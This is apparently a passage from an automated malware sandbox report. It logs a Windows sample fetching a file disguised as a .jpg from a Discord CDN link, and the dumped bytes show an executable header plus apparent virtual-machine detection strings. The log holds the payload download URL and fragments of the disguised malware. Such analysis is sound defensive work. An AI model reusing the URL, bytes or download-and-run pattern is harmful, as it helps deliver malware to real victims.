                                                                                              Data Ascii: 0 80 0 51 0 119 0 84 0 117 0 80 0 105 0 43 0 73 0 79 0 57 0 99 0 114 0 114 0 76 0 80 0 84 0 114 0 117 0 56 0 70 0 52 0 88 0 107 0 109 0 104 0 116 0 121 0 71 0 72 0 53 0 112 0 118 0 69 0 113 0 67 0 103 0 117 0 108 0 117 0 102 0 83 0 101 0 55 0 112 0 103 0
                                                                                              2021-09-27 18:27:27 UTC1579INData Raw: 37 36 20 30 20 35 30 20 30 20 35 37 20 30 20 31 30 36 20 30 20 39 39 20 30 20 35 31 20 30 20 36 35 20 30 20 31 31 37 20 30 20 39 39 20 30 20 35 30 20 30 20 38 36 20 30 20 31 30 36 20 30 20 31 30 30 20 30 20 37 31 20 30 20 31 30 38 20 30 20 31 31 30 20 30 20 39 38 20 30 20 31 32 31 20 30 20 35 33 20 30 20 31 30 36 20 30 20 39 38 20 30 20 35 30 20 30 20 34 38 20 30 20 31 31 39 20 30 20 36 38 20 30 20 38 31 20 30 20 38 39 20 30 20 37 34 20 30 20 37 35 20 30 20 31 31 31 20 30 20 39 30 20 30 20 37 33 20 30 20 31 30 34 20 30 20 31 31 38 20 30 20 39 39 20 30 20 37 38 20 30 20 36 35 20 30 20 38 31 20 30 20 36 39 20 30 20 37 37 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 37 33 20 30 20 36 36 20 30 20 36
                                                                                              Data Ascii: 76 0 50 0 57 0 106 0 99 0 51 0 65 0 117 0 99 0 50 0 86 0 106 0 100 0 71 0 108 0 110 0 98 0 121 0 53 0 106 0 98 0 50 0 48 0 119 0 68 0 81 0 89 0 74 0 75 0 111 0 90 0 73 0 104 0 118 0 99 0 78 0 65 0 81 0 69 0 77 0 66 0 81 0 65 0 68 0 103 0 103 0 73 0 66 0 6
                                                                                              2021-09-27 18:27:27 UTC1595INData Raw: 31 36 20 30 20 37 30 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 31 35 20 30 20 38 39 20 30 20 31 32 31 20 30 20 31 31 34 20 30 20 35 32 20 30 20 34 37 20 30 20 31 30 37 20 30 20 37 35 20 30 20 31 32 31 20 30 20 38 36 20 30 20 38 32 20 30 20 31 30 30 20 30 20 34 39 20 30 20 37 36 20 30 20 31 30 38 20 30 20 31 31 33 20 30 20 31 30 30 20 30 20 37 34 20 30 20 35 34 20 30 20 35 37 20 30 20 38 33 20 30 20 37 35 20 30 20 35 34 20 30 20 38 39 20 30 20 37 37 20 30 20 38 39 20 30 20 37 33 20 30 20 36 39 20 30 20 37 36 20 30 20 36 38 20 30 20 36 37 20 30 20 36 37 20 30 20 36 36 20 30 20 36 37 20 30 20 31 30 33 20 30 20 36 37 20 30 20 36 35 20 30 20 38 31 20 30 20 36 39 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 39 30 20 30 20 36 39 20 30 20 31 31 39 20 30 20 31
                                                                                              Data Ascii: 16 0 70 0 111 0 65 0 115 0 89 0 121 0 114 0 52 0 47 0 107 0 75 0 121 0 86 0 82 0 100 0 49 0 76 0 108 0 113 0 100 0 74 0 54 0 57 0 83 0 75 0 54 0 89 0 77 0 89 0 73 0 69 0 76 0 68 0 67 0 67 0 66 0 67 0 103 0 67 0 65 0 81 0 69 0 119 0 103 0 90 0 69 0 119 0 1
                                                                                              2021-09-27 18:27:27 UTC1611INData Raw: 31 31 30 20 30 20 31 31 31 20 30 20 33 37 20 30 20 31 31 32 20 30 20 33 37 20 30 20 31 31 36 20 30 20 39 37 20 30 20 31 32 30 20 30 20 31 30 37 20 30 20 31 32 30 20 30 20 31 32 30 20 30 20 31 30 37 20 30 20 31 31 34 20 30 20 31 31 39 20 30 20 31 30 30 20 30 20 31 31 35 20 30 20 39 37 20 30 20 31 30 37 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 30 39 20 30 20 31 30 32 20 30 20 31 32 32 20 30 20 31 30 38 20 30 20 31 30 35 20 30 20 31 31 34 20 30 20 31 32 31 20 30 20 31 31 33 20 30 20 31 31 33 20 30 20 31 31 31 20 30 20 33 37 20 30 20 31 31 39 20 30 20 33 37 20 30 20 31 31 37 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 33 37 20 30 20 31 31 37 20 30 20 33 37 20 30 20 31 31 38 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 31 31 36 20 30 20 31 31
                                                                                              Data Ascii: 110 0 111 0 37 0 112 0 37 0 116 0 97 0 120 0 107 0 120 0 120 0 107 0 114 0 119 0 100 0 115 0 97 0 107 0 37 0 32 0 37 0 109 0 102 0 122 0 108 0 105 0 114 0 121 0 113 0 113 0 111 0 37 0 119 0 37 0 117 0 111 0 118 0 37 0 117 0 37 0 118 0 101 0 106 0 116 0 11
                                                                                              2021-09-27 18:27:27 UTC1627INData Raw: 37 20 30 20 39 39 20 30 20 31 31 38 20 30 20 39 37 20 30 20 31 31 36 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 31 34 20 30 20 31 31 30 20 30 20 31 31 35 20 30 20 31 31 30 20 30 20 31 31 39 20 30 20 31 30 39 20 30 20 33 37 20 30 20 38 33 20 30 20 33 37 20 30 20 31 31 34 20 30 20 31 30 38 20 30 20 31 31 35 20 30 20 31 30 32 20 30 20 33 37 20 30 20 36 38 20 30 20 33 37 20 30 20 39 37 20 30 20 31 31 32 20 30 20 31 32 30 20 30 20 31 32 30 20 30 20 31 30 31 20 30 20 31 30 30 20 30 20 33 37 20 30 20 38 32 20 30 20 33 37 20 30 20 31 32 30 20 30 20 31 30 36 20 30 20 39 37 20 30 20 31 30 35 20 30 20 31 30 36 20 30 20 31 30 34 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 31 32 31 20 30 20 39 39 20 30 20 31 31 33 20
                                                                                              Data Ascii: 7 0 99 0 118 0 97 0 116 0 37 0 32 0 37 0 114 0 110 0 115 0 110 0 119 0 109 0 37 0 83 0 37 0 114 0 108 0 115 0 102 0 37 0 68 0 37 0 97 0 112 0 120 0 120 0 101 0 100 0 37 0 82 0 37 0 120 0 106 0 97 0 105 0 106 0 104 0 109 0 105 0 101 0 106 0 121 0 99 0 113
                                                                                              2021-09-27 18:27:27 UTC1643INData Raw: 20 30 20 33 37 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 31 37 20 30 20 31 31 39 20 30 20 31 30 35 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 30 38 20 30 20 31 31 36 20 30 20 31 30 34 20 30 20 33 37 20 30 20 31 30 35 20 30 20 33 37 20 30 20 31 30 35 20 30 20 39 38 20 30 20 31 31 32 20 30 20 31 31 33 20 30 20 31 31 38 20 30 20 31 31 39 20 30 20 31 30 38 20 30 20 31 31 34 20 30 20 31 30 39 20 30 20 31 32 32 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 30 39 20 30 20 31 30 34 20 30 20 31 31 30 20 30 20 31 30 32 20 30 20 31 31 33 20 30 20 31 31 36 20 30 20 31 31 33 20 30 20 31 31 39 20 30 20 33 37 20 30 20 39 37 20 30 20 33 37 20 30 20 39 39 20 30 20 31 30 32 20 30 20 31 30 31 20 30 20 31 31 33 20 30 20 31 32 30 20 30 20 31 30 30 20 30
                                                                                              Data Ascii: 0 37 0 100 0 37 0 117 0 119 0 105 0 116 0 101 0 108 0 116 0 104 0 37 0 105 0 37 0 105 0 98 0 112 0 113 0 118 0 119 0 108 0 114 0 109 0 122 0 37 0 115 0 37 0 109 0 104 0 110 0 102 0 113 0 116 0 113 0 119 0 37 0 97 0 37 0 99 0 102 0 101 0 113 0 120 0 100 0
                                                                                              2021-09-27 18:27:27 UTC1659INData Raw: 30 20 31 31 34 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 30 20 33 33 20 38 36 20 30 20 31 30 35 20 30 20 31 30 30 20 30 20 31 30 31 20 30 20 31 31 31 20 30 20 36 36 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 35 20 30 20 38 36 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 30 20 32 31 20 38 36 20 30 20 37 33 20 30 20 38 32 20 30 20 38 34 20 30 20 38 35 20 30 20 36 35 20 30 20 37 36 20 30 20 36 36 20 30 20 37 39 20 30 20 38 38 20 30 20 30 20 38 35 20 38 33 20 30 20 37 39 20 30 20 37 30 20 30 20 38 34 20 30 20 38 37 20 30 20 36 35 20 30 20 38 32 20 30 20 36 39 20 30 20 39 32 20 30 20 37 39 20 30 20 31 31 34 20 30 20 39 37 20 30 20 39 39 20 30
                                                                                              Data Ascii: 0 114 0 115 0 105 0 111 0 110 0 0 33 86 0 105 0 100 0 101 0 111 0 66 0 105 0 111 0 115 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 21 86 0 73 0 82 0 84 0 85 0 65 0 76 0 66 0 79 0 88 0 0 85 83 0 79 0 70 0 84 0 87 0 65 0 82 0 69 0 92 0 79 0 114 0 97 0 99 0
                                                                                              2021-09-27 18:27:27 UTC1675INData Raw: 39 32 20 34 20 31 34 39 20 30 20 30 20 31 39 32 20 34 20 31 35 30 20 30 20 30 20 31 39 32 20 34 20 31 35 31 20 30 20 30 20 31 39 32 20 34 20 31 35 32 20 30 20 30 20 31 39 32 20 34 20 31 37 31 20 30 20 30 20 31 39 32 20 34 20 31 37 32 20 30 20 30 20 31 39 32 20 34 20 31 37 33 20 30 20 30 20 31 39 32 20 34 20 31 37 34 20 30 20 30 20 31 39 32 20 34 20 31 37 35 20 30 20 30 20 31 39 32 20 34 20 31 37 36 20 30 20 30 20 31 39 32 20 34 20 31 37 37 20 30 20 30 20 31 39 32 20 34 20 31 37 38 20 30 20 30 20 31 39 32 20 34 20 31 37 39 20 30 20 30 20 31 39 32 20 34 20 31 38 30 20 30 20 30 20 31 39 32 20 34 20 31 38 31 20 30 20 30 20 31 39 32 20 34 20 31 38 32 20 30 20 30 20 31 39 32 20 34 20 31 38 33 20 30 20 30 20 31 39 32 20 34 20 31 38 34 20 30 20 30 20 31 39 32 20
                                                                                              Data Ascii: 92 4 149 0 0 192 4 150 0 0 192 4 151 0 0 192 4 152 0 0 192 4 171 0 0 192 4 172 0 0 192 4 173 0 0 192 4 174 0 0 192 4 175 0 0 192 4 176 0 0 192 4 177 0 0 192 4 178 0 0 192 4 179 0 0 192 4 180 0 0 192 4 181 0 0 192 4 182 0 0 192 4 183 0 0 192 4 184 0 0 192


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.549742162.159.133.233443C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-09-27 18:27:44 UTC1690OUTGET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1
                                                                                              Host: cdn.discordapp.com
                                                                                              Connection: Keep-Alive
                                                                                              2021-09-27 18:27:44 UTC1690INHTTP/1.1 200 OK
                                                                                              Date: Mon, 27 Sep 2021 18:27:44 GMT
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Length: 1729443
                                                                                              Connection: close
                                                                                              CF-Ray: 6956c9adba64375f-MXP
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 1186
                                                                                              Cache-Control: public, max-age=31536000
                                                                                              ETag: "2ac5f86f290ec12916b30b63f8da6e5d"
                                                                                              Expires: Tue, 27 Sep 2022 18:27:44 GMT
                                                                                              Last-Modified: Thu, 23 Sep 2021 20:00:54 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              Cf-Bgj: h2pri
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              x-goog-generation: 1632427254972338
                                                                                              x-goog-hash: crc32c=rCGZkw==
                                                                                              x-goog-hash: md5=KsX4bykOwSkWswtj+NpuXQ==
                                                                                              x-goog-metageneration: 1
                                                                                              x-goog-storage-class: STANDARD
                                                                                              x-goog-stored-content-encoding: identity
                                                                                              x-goog-stored-content-length: 1729443
                                                                                              X-GUploader-UploadID: ADPycdsfSu6fJtDW9HkahbvMR-roS5LUPKi7V3J3d7FUAokax5jZBtayADlbxIAInHxVI5ODwjSxTSzUsmwOnTRs4zDOFAag8w
                                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XyUsKulmw2qq4uY1dmfrOD2ldFY8Dda4hTNYJAgJ6Ll4QEDYGFDnUJFbPm0%2BsmhvkyL07TipxVfAU7Z7ZjcJLaIgGNzRPXPDJpOyGZ%2BGrUdPRugswc7lPIWNRdlse0DaTmJBTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              2021-09-27 18:27:44 UTC1691INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                              2021-09-27 18:27:44 UTC1691INData Raw: 37 37 20 39 30 20 31 34 34 20 30 20 33 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 38 20 30 20 30 20 30 20 31 34 20 33 31 20 31 38 36 20 31 34 20 30 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 39 39 20 39 37 20 31 31 30 20 31 31 30 20 31 31 31 20 31 31 36 20
                                                                                              Data Ascii: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116
                                                                                              2021-09-27 18:27:44 UTC1693INData Raw: 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 35 20 34 30 20 32 32 39 20 31 30 39 20 31 31 35 20 35 30 20 34 38 20 35 30 20 35 30 20 38 34 20 31 31 34 20 31 31 37 20 31 34 36 20 31 34 33 20 35 30 20 34 38 20 31 33 38 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 31 32 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 37 36 20 35 30 20 35 34 20 38 34 20 31 32 34 20 31 30 36 20 32 31 35 20 31 32 36 20 35
                                                                                              Data Ascii: 0 0 0 0 0 0 0 0 25 40 229 109 115 50 48 50 50 84 114 117 146 143 50 48 138 54 84 114 117 109 112 50 112 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 176 50 54 84 124 106 215 126 5
                                                                                              2021-09-27 18:27:44 UTC1694INData Raw: 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 38 20 35 34 20 38 34 20 31 38 20 39 31 20 33 31 20 32 31 20 39 34 20 39 35 20 38 31 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 30 39 20 31 31 32 20 32 34 38 20 34 39 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 35 33 20 31 30 39 20 31 31 32 20 31 31 32 20 33 30 20 36 34 20 36 39 20 33 38 20 31 37 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 34 20 38 31 20 35 31 20 35 34 20 38 34 20 38 32 20 31 31 39 20 31 30 39 20 31 31 32 20 38 30 20 34 39
                                                                                              Data Ascii: 9 112 50 48 50 54 84 114 117 109 112 50 48 18 54 84 18 91 31 21 94 95 81 54 84 126 117 109 112 50 48 48 54 84 112 117 109 112 248 49 50 54 84 114 117 109 112 50 48 50 54 84 114 53 109 112 112 30 64 69 38 17 117 109 112 114 81 51 54 84 82 119 109 112 80 49
                                                                                              2021-09-27 18:27:44 UTC1695INData Raw: 31 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 35 30 20 33 33 20 37 36 20 35 32 20 38 34 20 31 31 34 20 31 31 33 20 32 20 37 37 20 35 30 20 34 38 20 35 36 20 32 38 20 38 34 20 39 37 20 36 39 20 31 30 38 20 31 31 32 20 35 37 20 34 38 20 35 30 20 35 34 20 38 30 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 34 39 20 34 38 20 35 30 20 35 30 20 35 39 20 37 36 20 31 31 37 20 31 30 39 20 31 32 32 20 32 34 20 34 38 20 33 33 20 36 20 38 35 20 31 31 34 20 31 32 36 20 31 30 39 20 31 31 32 20 35 30 20 35 33 20 35 30 20 35 34 20 36 39 20 31 32 20 31 31 33 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 33 20 35 34 20 38 34 20 31 32 30 20 39 35 20 31 30 39 20 39 39 20 32 20 34 39 20 35 30 20 36 31 20 38 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 31
                                                                                              Data Ascii: 1 84 114 117 110 112 50 33 76 52 84 114 113 2 77 50 48 56 28 84 97 69 108 112 57 48 50 54 80 114 117 124 14 49 48 50 50 59 76 117 109 122 24 48 33 6 85 114 126 109 112 50 53 50 54 69 12 113 109 112 54 95 13 54 84 120 95 109 99 2 49 50 61 84 114 117 107 11
                                                                                              2021-09-27 18:27:44 UTC1697INData Raw: 20 31 31 32 20 35 36 20 36 37 20 31 32 33 20 35 34 20 38 34 20 31 32 30 20 31 35 20 33 30 20 35 38 20 35 30 20 34 38 20 35 36 20 33 35 20 31 32 31 20 31 31 33 20 38 33 20 37 30 20 31 31 39 20 31 37 38 20 35 36 20 35 30 20 35 34 20 38 30 20 38 39 20 31 31 37 20 31 39 20 31 32 30 20 35 30 20 34 38 20 35 34 20 32 33 30 20 39 32 20 31 31 34 20 31 31 37 20 31 31 38 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 36 34 20 32 39 20 36 32 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 35 34 20 35 34 20 38 34 20 38 39 20 31 31 30 20 36 34 20 31 31 38 20 32 30 20 32 33 37 20 37 38 20 35 34 20 38 34 20 31 31 34 20 31 32 37 20 37 30 20 31 33 36 20 37 31 20 31 38 30 20 35 30 20 35 34 20 38 35 20 38 37 20 38 38 20 31 30 35 20 38 36 20 33 36 20 32 37 20 34 34 20 31 39
                                                                                              Data Ascii: 112 56 67 123 54 84 120 15 30 58 50 48 56 35 121 113 83 70 119 178 56 50 54 80 89 117 19 120 50 48 54 230 92 114 117 118 88 116 48 50 60 64 29 62 109 112 56 24 54 54 84 89 110 64 118 20 237 78 54 84 114 127 70 136 71 180 50 54 85 87 88 105 86 36 27 44 19
                                                                                              2021-09-27 18:27:44 UTC1698INData Raw: 39 31 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 37 38 20 31 30 31 20 38 38 20 31 30 36 20 38 36 20 32 36 20 31 31 33 20 35 30 20 35 34 20 39 34 20 38 38 20 38 33 20 37 30 20 31 33 35 20 35 30 20 33 35 20 32 20 35 30 20 38 34 20 31 31 31 20 31 31 37 20 31 30 39 20 31 31 32 20 35 37 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 33 20 39 38 20 36 34 20 39 38 20 32 30 20 35 31 20 33 39 20 34 33 20 31 32 31 20 31 32 35 20 38 33 20 36 39 20 33 34 20 35 30 20 34 38 20 35 36 20 33 30 20 37 20 31 31 34 20 31 31 37 20 31 30 33 20 39 30 20 32 30 20 32 37 20 32 32 32 20 31 36 20 31 32 37 20 31 35 37 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20 34 39 20 35 34 20 39 31 20 31 31 34 20 31 31 37 20 31 30 39 20 31 32 34
                                                                                              Data Ascii: 91 114 117 109 112 50 48 50 52 78 101 88 106 86 26 113 50 54 94 88 83 70 135 50 35 2 50 84 111 117 109 112 57 48 50 39 86 103 98 64 98 20 51 39 43 121 125 83 69 34 50 48 56 30 7 114 117 103 90 20 27 222 16 127 157 117 109 112 33 0 49 54 91 114 117 109 124
                                                                                              2021-09-27 18:27:44 UTC1699INData Raw: 38 20 35 30 20 34 35 20 37 34 20 39 35 20 31 32 37 20 37 35 20 31 34 20 35 20 34 38 20 35 30 20 35 30 20 31 32 30 20 39 36 20 39 34 20 31 31 30 20 31 32 32 20 32 35 20 31 39 36 20 37 36 20 30 20 38 34 20 31 31 34 20 31 31 33 20 31 30 37 20 38 38 20 31 30 34 20 34 39 20 35 30 20 34 38 20 31 32 31 20 31 31 38 20 39 38 20 31 30 32 20 39 31 20 34 38 20 33 38 20 35 37 20 34 39 20 31 32 34 20 31 30 39 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 33 35 20 32 20 35 33 20 38 34 20 36 31 20 31 31 37 20 31 30 39 20 31 31 32 20 33 34 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 30 20 32 33 39 20 32 30 20 36 36 20 35 30 20 34 38 20 35 31 20 37 31 20 31 30 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 34 20 33 31 20 32 20 32 30 20 35 32 20 36 37 20 32 33 32 20 31
                                                                                              Data Ascii: 8 50 45 74 95 127 75 14 5 48 50 50 120 96 94 110 122 25 196 76 0 84 114 113 107 88 104 49 50 48 121 118 98 102 91 48 38 57 49 124 109 117 109 118 24 35 2 53 84 61 117 109 112 34 48 50 39 86 100 239 20 66 50 48 51 71 102 114 117 108 104 31 2 20 52 67 232 1
                                                                                              2021-09-27 18:27:44 UTC1701INData Raw: 31 37 20 31 30 39 20 39 38 20 35 37 20 32 34 20 31 30 39 20 35 34 20 38 34 20 31 32 30 20 31 30 32 20 31 30 36 20 31 31 38 20 33 35 20 35 35 20 37 33 20 33 39 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 36 20 35 30 20 34 38 20 35 36 20 32 36 20 38 31 20 37 34 20 30 20 31 30 39 20 31 31 32 20 35 30 20 33 39 20 31 37 38 20 36 33 20 38 34 20 31 31 34 20 31 31 33 20 37 37 20 32 30 38 20 32 35 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 39 37 20 35 33 20 37 35 20 33 35 20 35 34 20 38 34 20 31 31 38 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 32 36 20 31 30 36 20 38 34 20 31 31 34 20 31 32 37 20 36 39 20 31 39 37 20 35 30 20 34 38 20 35 32 20 33 39 20 38 33 20 39 20 31 30 33 20 31 30 39 20 31 31 32 20 35 34 20 32
                                                                                              Data Ascii: 17 109 98 57 24 109 54 84 120 102 106 118 35 55 73 39 84 114 113 2 16 50 48 56 26 81 74 0 109 112 50 39 178 63 84 114 113 77 208 25 224 44 30 171 114 117 107 97 53 75 35 54 84 118 249 37 112 50 49 26 106 84 114 127 69 197 50 48 52 39 83 9 103 109 112 54 2
                                                                                              2021-09-27 18:27:44 UTC1702INData Raw: 35 38 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 30 20 35 30 20 35 34 20 38 35 20 31 35 20 31 30 30 20 31 30 39 20 31 31 32 20 35 34 20 35 36 20 34 38 20 34 39 20 36 37 20 34 32 20 32 33 39 20 32 30 20 36 36 20 35 30 20 34 38 20 35 31 20 37 31 20 31 30 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 33 20 36 31 20 34 38 20 35 30 20 35 30 20 39 32 20 31 31 32 20 31 31 34 20 31 31 37 20 34 30 20 31 36 38 20 36 38 20 31 35 33 20 35 34 20 38 34 20 31 31 35 20 38 20 31 32 35 20 31 31 32 20 35 30 20 35 32 20 35 38 20 35 32 20 38 33 20 31 30 37 20 34 35 20 32 34 37 20 39 20 31 38 20 34 38 20 35 30 20 35 35 20 33 37 20 38 32 20 31 31 37 20 31 30 39 20 31 31 33 20 37 39 20 33 34 20 35 30 20 35 34 20 38 30 20 31 32 32 20 31 31 39 20 31 30 36 20 31 30 36 20
                                                                                              Data Ascii: 58 117 109 113 67 120 50 54 85 15 100 109 112 54 56 48 49 67 42 239 20 66 50 48 51 71 102 114 117 108 13 61 48 50 50 92 112 114 117 40 168 68 153 54 84 115 8 125 112 50 52 58 52 83 107 45 247 9 18 48 50 55 37 82 117 109 113 79 34 50 54 80 122 119 106 106
                                                                                              2021-09-27 18:27:44 UTC1703INData Raw: 33 39 20 31 31 34 20 38 34 20 31 31 39 20 31 30 35 20 31 30 33 20 33 31 20 33 33 20 32 30 20 31 36 20 38 36 20 31 31 39 20 39 38 20 36 34 20 39 37 20 32 30 20 32 32 20 32 34 20 37 35 20 39 35 20 31 31 34 20 31 31 37 20 31 30 35 20 39 31 20 32 31 36 20 37 37 20 36 32 20 35 34 20 38 34 20 31 31 38 20 39 34 20 31 33 35 20 31 33 20 36 33 20 34 38 20 35 30 20 35 30 20 31 32 37 20 31 35 32 20 31 31 37 20 31 32 36 20 36 34 20 35 32 20 34 38 20 31 38 31 20 35 34 20 38 34 20 31 31 34 20 39 37 20 31 30 39 20 31 31 32 20 33 35 20 35 30 20 33 37 20 31 36 37 20 36 36 20 39 34 20 39 34 20 37 35 20 31 31 35 20 31 38 38 20 38 39 20 33 36 20 32 36 20 31 31 35 20 38 34 20 31 31 34 20 31 31 34 20 31 32 33 20 31 30 36 20 35 34 20 34 37 20 31 31 30 20 35 33 20 31 36 30 20 39
                                                                                              Data Ascii: 39 114 84 119 105 103 31 33 20 16 86 119 98 64 97 20 22 24 75 95 114 117 105 91 216 77 62 54 84 118 94 135 13 63 48 50 50 127 152 117 126 64 52 48 181 54 84 114 97 109 112 35 50 37 167 66 94 94 75 115 188 89 36 26 115 84 114 114 123 106 54 47 110 53 160 9
                                                                                              2021-09-27 18:27:44 UTC1705INData Raw: 34 20 32 36 20 35 20 31 31 32 20 35 30 20 35 38 20 32 34 20 31 36 20 31 32 37 20 31 35 38 20 38 33 20 37 30 20 31 33 32 20 34 39 20 30 20 35 36 20 35 34 20 31 30 30 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 37 36 20 31 30 34 20 38 38 20 31 30 33 20 38 36 20 37 33 20 34 30 20 35 30 20 35 34 20 38 30 20 39 35 20 31 31 35 20 37 30 20 31 31 35 20 32 30 20 32 37 20 31 39 38 20 32 38 20 38 36 20 31 31 31 20 31 30 35 20 36 34 20 39 38 20 32 30 20 37 35 20 34 32 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 31 32 30 20 31 30 36 20 33 31 20 35 38 20 32 30 20 38 39 20 36 31 20 31 31 34 20 31 31 37 20 31 30 33 20 39 30 20 32 30 20 32 37 20 32 32 32 20 31 36 20 31 32 37 20 31 33 34 20 31 31 38 20 39 33 20 31 32 32 20 35 30
                                                                                              Data Ascii: 4 26 5 112 50 58 24 16 127 158 83 70 132 49 0 56 54 100 114 117 109 112 50 48 50 52 76 104 88 103 86 73 40 50 54 80 95 115 70 115 20 27 198 28 86 111 105 64 98 20 75 42 54 84 118 118 120 106 31 58 20 89 61 114 117 103 90 20 27 222 16 127 134 118 93 122 50
